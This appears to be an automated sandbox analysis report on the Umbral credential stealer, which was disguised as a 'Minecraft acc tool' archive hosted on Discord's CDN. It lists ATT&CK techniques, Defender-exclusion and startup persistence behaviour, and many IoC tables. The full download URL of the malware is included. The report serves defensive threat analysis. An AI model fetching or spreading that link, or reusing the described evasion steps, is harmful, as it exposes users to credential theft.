umbral | hxxps://cdn[.]discordapp[.]com/attachments/1279178348202950717/1279179598114062416/Minecraft_acc_tool[.]rar?ex=66d38056&is=66d22ed6&hm=720943ed0f8868d3c122ac85477418c111a94ee92ee94b2dfd980a7cd71d34b6&

Analysis

max time kernel
745s
max time network
748s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
30-08-2024 20:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1279178348202950717/1279179598114062416/Minecraft_acc_tool.rar?ex=66d38056&is=66d22ed6&hm=720943ed0f8868d3c122ac85477418c111a94ee92ee94b2dfd980a7cd71d34b6&

Score

10^/10

umbral credential_access discovery execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000e00000002364a-1621.dat	family_umbral
behavioral1/memory/5208-1855-0x00000162A59E0000-0x00000162A5A20000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2332	powershell.exe
5020	powershell.exe
2220	powershell.exe
6132	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
2128	winrar-x64-701.exe
5208	Minecraft acc tool.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
269	discord.com
270	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
266	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
persistence privilege_escalation

Accessibility Features
T1546.008

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1776	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Downloads"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 200000001a00eebbfe23000010009bee837d4422704eb1f55393042af1e400000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Downloads"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "2"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe

NTFS ADS 3 IoCs

description	ioc	Process
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vb67y.scr\:SmartScreen:$DATA	Minecraft acc tool.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 646669.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 54913.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 63 IoCs

pid	Process
2600	msedge.exe
2600	msedge.exe
2476	msedge.exe
2476	msedge.exe
3576	identity_helper.exe
3576	identity_helper.exe
4592	msedge.exe
4592	msedge.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
6056	msedge.exe
6056	msedge.exe
5536	msedge.exe
5536	msedge.exe
5536	msedge.exe
5536	msedge.exe
5108	msedge.exe
5108	msedge.exe
3484	msedge.exe
3484	msedge.exe
4916	msedge.exe
4916	msedge.exe
4932	msedge.exe
4932	msedge.exe
1940	msedge.exe
1940	msedge.exe
5408	msedge.exe
5408	msedge.exe
2764	msedge.exe
2764	msedge.exe
2332	powershell.exe
2332	powershell.exe
2332	powershell.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
6132	powershell.exe
6132	powershell.exe
6132	powershell.exe
4816	powershell.exe
4816	powershell.exe
4816	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4868	OpenWith.exe
4648	osk.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 32 IoCs

pid	Process
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	5988	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5988	AUDIODG.EXE
Token: SeDebugPrivilege	5208	Minecraft acc tool.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	6132	powershell.exe
Token: SeDebugPrivilege	4816	powershell.exe
Token: SeIncreaseQuotaPrivilege	1032	wmic.exe
Token: SeSecurityPrivilege	1032	wmic.exe
Token: SeTakeOwnershipPrivilege	1032	wmic.exe
Token: SeLoadDriverPrivilege	1032	wmic.exe
Token: SeSystemProfilePrivilege	1032	wmic.exe
Token: SeSystemtimePrivilege	1032	wmic.exe
Token: SeProfSingleProcessPrivilege	1032	wmic.exe
Token: SeIncBasePriorityPrivilege	1032	wmic.exe
Token: SeCreatePagefilePrivilege	1032	wmic.exe
Token: SeBackupPrivilege	1032	wmic.exe
Token: SeRestorePrivilege	1032	wmic.exe
Token: SeShutdownPrivilege	1032	wmic.exe
Token: SeDebugPrivilege	1032	wmic.exe
Token: SeSystemEnvironmentPrivilege	1032	wmic.exe
Token: SeRemoteShutdownPrivilege	1032	wmic.exe
Token: SeUndockPrivilege	1032	wmic.exe
Token: SeManageVolumePrivilege	1032	wmic.exe
Token: 33	1032	wmic.exe
Token: 34	1032	wmic.exe
Token: 35	1032	wmic.exe
Token: 36	1032	wmic.exe
Token: SeIncreaseQuotaPrivilege	1032	wmic.exe
Token: SeSecurityPrivilege	1032	wmic.exe
Token: SeTakeOwnershipPrivilege	1032	wmic.exe
Token: SeLoadDriverPrivilege	1032	wmic.exe
Token: SeSystemProfilePrivilege	1032	wmic.exe
Token: SeSystemtimePrivilege	1032	wmic.exe
Token: SeProfSingleProcessPrivilege	1032	wmic.exe
Token: SeIncBasePriorityPrivilege	1032	wmic.exe
Token: SeCreatePagefilePrivilege	1032	wmic.exe
Token: SeBackupPrivilege	1032	wmic.exe
Token: SeRestorePrivilege	1032	wmic.exe
Token: SeShutdownPrivilege	1032	wmic.exe
Token: SeDebugPrivilege	1032	wmic.exe
Token: SeSystemEnvironmentPrivilege	1032	wmic.exe
Token: SeRemoteShutdownPrivilege	1032	wmic.exe
Token: SeUndockPrivilege	1032	wmic.exe
Token: SeManageVolumePrivilege	1032	wmic.exe
Token: 33	1032	wmic.exe
Token: 34	1032	wmic.exe
Token: 35	1032	wmic.exe
Token: 36	1032	wmic.exe
Token: SeIncreaseQuotaPrivilege	1276	wmic.exe
Token: SeSecurityPrivilege	1276	wmic.exe
Token: SeTakeOwnershipPrivilege	1276	wmic.exe
Token: SeLoadDriverPrivilege	1276	wmic.exe
Token: SeSystemProfilePrivilege	1276	wmic.exe
Token: SeSystemtimePrivilege	1276	wmic.exe
Token: SeProfSingleProcessPrivilege	1276	wmic.exe
Token: SeIncBasePriorityPrivilege	1276	wmic.exe
Token: SeCreatePagefilePrivilege	1276	wmic.exe
Token: SeBackupPrivilege	1276	wmic.exe
Token: SeRestorePrivilege	1276	wmic.exe
Token: SeShutdownPrivilege	1276	wmic.exe
Token: SeDebugPrivilege	1276	wmic.exe
Token: SeSystemEnvironmentPrivilege	1276	wmic.exe
Token: SeRemoteShutdownPrivilege	1276	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe
2476	msedge.exe

Suspicious use of SetWindowsHookEx 58 IoCs

pid	Process
4868	OpenWith.exe
4868	OpenWith.exe
4868	OpenWith.exe
4868	OpenWith.exe
4868	OpenWith.exe
4868	OpenWith.exe
4868	OpenWith.exe
4868	OpenWith.exe
4868	OpenWith.exe
4868	OpenWith.exe
4868	OpenWith.exe
4868	OpenWith.exe
4868	OpenWith.exe
4868	OpenWith.exe
4868	OpenWith.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
4268	AcroRd32.exe
6036	AcroRd32.exe
4268	AcroRd32.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
3484	msedge.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4916	msedge.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
2128	winrar-x64-701.exe
2128	winrar-x64-701.exe
2128	winrar-x64-701.exe
4648	osk.exe
4648	osk.exe
1940	msedge.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
2764	msedge.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe
4648	osk.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2476 wrote to memory of 2504	2476	msedge.exe	84
PID 2476 wrote to memory of 2504	2476	msedge.exe	84
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
